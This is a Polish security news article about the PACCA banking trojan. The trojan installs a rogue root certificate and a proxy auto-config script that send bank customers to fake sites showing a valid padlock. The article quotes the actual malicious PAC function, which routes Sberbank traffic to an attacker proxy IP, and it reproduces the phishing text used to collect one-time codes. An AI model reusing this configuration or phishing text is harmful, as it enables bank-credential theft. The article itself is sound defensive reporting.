Nie pomoże zielona kłódka – ten koń trojański tak podmieni stronę banku, że nie zauważysz

dodał 15 czerwca 2016 o 22:04 w kategorii Złośniki  z tagami:
Nie pomoże zielona kłódka – ten koń trojański tak podmieni stronę banku, że nie zauważysz

Nawet jeśli zawsze samodzielnie wpisujesz w przeglądarce adres WWW swojego banku i sprawdzasz czy w pasku adresu widać zieloną kłódkę to i tak możesz trafić na serwer przestępców. Najnowszy koń trojański potrafi Cię sprytnie oszukać.

We wszystkich poradnikach bezpiecznego korzystania z bankowości elektronicznej podkreślane są dwa elementy, których weryfikacja ma uchronić użytkownika przed utratą pieniędzy – prawidłowość adresu strony WWW banku oraz obecność przed adresem zielonej kłódki. Przestępcy wymyślają coraz to nowe sposoby, by ten problem ominąć a najnowsze ich rozwiązanie jest bardzo proste i niestety dość skuteczne.

Nowy pomysł na atak

Przez wiele lat przestępcy omijali problem certyfikatów SSL na stronach banków wstrzykując za pośrednictwem złośliwego oprogramowania dodatkową treść bezpośrednio do przeglądarki po stronie klienta. Do strony WWW banku doklejali dodatkowe komunikaty czy okienka i wyłudzali kody jednorazowe oraz kradli pieniądze z kont użytkowników. Banki jednak nauczyły się całkiem nieźle wykrywać takie modyfikacje i obecnie szybko blokują konta zainfekowanych klientów. Przestępcy musieli zatem wymyślić coś nowego – coś, co pozwoli im na odcięcie klienta od serwera banku (by bank nie zorientował się, ze dochodzi do oszustwa) jednocześnie dając mu wrażenie, że ciągle z tego serwera korzysta. By ten cel zrealizować złodzieje stworzyli kilka wersji oprogramowania przekierowującego ruch klientów na fałszywe strony banków. Jedną z nich odkryto kilka tygodni temu w Polsce (aktualizacja: podobno pierwsze obserwacje sięgają lutego 2016) i jest ona wykorzystywana w atakach na klientów co najmniej dwóch dużych banków.

Jak działa złośliwy program

Koń trojański dystrybuowany przez przestępców jest dość prosty w swojej konstrukcji. Po uruchomieniu na komputerze ofiary przeprowadza dwie kluczowe dla powodzenia ataku operacje. Po pierwsze instaluje skrypt PAC, odpowiadający za automatyczną konfigurację ustawień serwera proxy i dla dwóch serwerów bankowych wskazuje adres IP znajdujący się np. na Ukrainie. Klienci chcący odwiedzić witryny tych banków trafią na złośliwy serwer proxy, który pokaże im fałszywe strony wyglądające prawie identycznie jak oryginalne. Aby jednak witryny te wyglądały bardziej niewinnie, program instaluje także w zainfekowanym systemie dodatkowy certyfikat nadrzędnego urzędu certyfikacji. Dzięki temu fałszywa strona banku może pokazywać zieloną kłódkę będącą symbolem zaufanego połączenia zgodnego z wyświetlaną nazwą domeny.

Złośliwy program konfigurację serwera proxy pobiera z serwera C&C. Znaleźliśmy na nim dwa różne pliki konfiguracyjne – jeden przeznaczony dla polskiego banku kierujący ruch do serwera w firmie DigitalOcean oraz drugi, przeznaczony dla rosyjskiego banku Sbierbank, kierujący ruch do serwerowni OVH:

function FindProxyForURL(url,host){var P = "PROXY 94.23.148.224:8087";if ((shExpMatch(url,"http://localhost:28016/i*")) || (shExpMatch(host,"sbi.sbe?ba?k.ru"))){return P;}return "DIRECT";}

Co ciekawe adres serwera piterame.com wykorzystywanego przez przestępców można znaleźć już 22 maja na rosyjskich forach w kontekście opisu identycznych mechanizmów ataków właśnie na Sbierbank.

Jak rozpoznać atak w trakcie jego trwania

Niestety żaden z banków nie zdecydował się na ujawnienie wyglądu komunikatów generowanych przez przestępców, więc nie mamy dla Was zrzutów ekranu. Ustaliliśmy jednak, że złośliwa strona najpierw przychwytuje login i hasło użytkownika a następnie próbuje wyłudzać kody jednorazowe wyświetlając komunikat o treści:

W trosce o Państwa dane widniejące w systemie bankowym prosimy o potwierdzenie tożsamości poprzez podanie kodu z narzędzia autoryzacyjnego. Wielokrotna próba logowania bez podania kodu będzie skutkowała blokadą dostępu do bankowości elektronicznej!

Następnie pojawia się prośba o podanie kodu jednorazowego. Gdy podejrzliwy klient poda jedną z następujących wartości:  000000, 111111, 222222, 333333, 444444, 555555, 666666, 777777, 888888, 9999999, 000000, 123456, 654321 to witryna poinformuje go, że podany token jest nieprawidłowy (komentarz w kodzie strony brzmi bad token, dont fuck with me). Następnie witryna przetrzymuje klientów wyświetlając im komunikaty o przerwie w działaniu banku (nie wspominając, że na prawdziwej stronie banku trwa właśnie zlecanie operacji, która uszczupli ich konta). W jednym ze znanych nam przypadków komunikat wyświetlony klientowi brzmiał:

Z powodu prac strona banku jest chwilowo nieczynna, przepraszamy za utrudnienia. Wracamy za 11 Godzin, 57 Minut.

W razie wątpliwości można jednak łatwo zweryfikować certyfikat strony. Z pomocą pojawia się tu firma Prebytes, które przeanalizowała zagrożenie i na stronie Związku Banków Polskich podzieliła się szczegółową instrukcją opisującą jak usunąć efekty działania konia trojańskiego.

Źródło: Prebytes

Źródło: Prebytes

Opisywany koń trojański otrzymał nazwę PACCA (od pliku PAC i certyfikatu CA) i zainfekował do tej pory co najmniej kilkaset komputerów.  Fragmenty kodu odpowiedzialnego za modyfikację witryny banku zawierają część komentarzy w języku angielskim, lecz można trafić też na takie ciągi znaków jak usuntekscik czy daneniepoprawne. Biorąc pod uwagę listę celów złośliwego oprogramowania można podejrzewać, że jest ono wynikiem współpracy polsko – rosyjskiej lub tworem całkowicie rodzimej produkcji. Jeśli autor ma na ten temat jakieś przemyślenia to zapraszamy do kontaktu.

Dziękujemy firmie Prebytes za konsultacje.